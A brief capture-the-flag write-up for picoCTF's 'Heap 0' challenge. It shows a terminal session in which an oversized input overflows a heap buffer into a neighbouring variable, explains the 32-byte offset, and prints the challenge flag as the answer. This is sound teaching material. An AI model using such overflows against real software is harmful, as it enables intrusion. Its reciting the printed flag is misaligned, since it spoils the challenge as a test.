Pico CTF

Heap 0

Description

Are overflows just a stack concern? Download the binary here. Download the source here.

nc tethys.picoctf.net 49664

Hints

  1. What part of the heap do you have control over and how far is it from the safe_var?

Solution

picoCTF{my_first_heap_overflow_e4c92a78}

CLI

kappa@kappa-Aspire-Z5600:~$ nc tethys.picoctf.net 49664

Welcome to heap0!
I put my data on the heap so it should be safe from any tampering.
Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you.

Heap State:
+-------------+----------------+
[*] Address -> Heap Data
+-------------+----------------+
[*] 0x59132c59c2b0 -> pico
+-------------+----------------+
[*] 0x59132c59c2d0 -> bico
+-------------+----------------+

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 3

Take a look at my variable: safe_var = bico

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 2
Data for buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

1. Print Heap: (print the current state of the heap)
2. Write to buffer: (write to your own personal block of data on the heap)
3. Print safe_var: (I'll even let you look at my variable on the heap, I'm confident it can't be modified)
4. Print Flag: (Try to print the flag, good luck)
5. Exit

Enter your choice: 4

YOU WIN
picoCTF{my_first_heap_overflow_e4c92a78}
kappa@kappa-Aspire-Z5600:~$

  • The address of input_data is 0x63c3882552b0
  • The address of safe_var is 0x63c3882552d0

Subtracting these two addresses:

  • 0x63c3882552d0 - 0x63c3882552b0 = 0x20
  • 0x20 in hexadecimal is coverted to decimal = 32

So, inputting a string of 33 characters or more will allow us to overwrite the “bico” in safe_var with something else, causing the check_win() function to print the flag.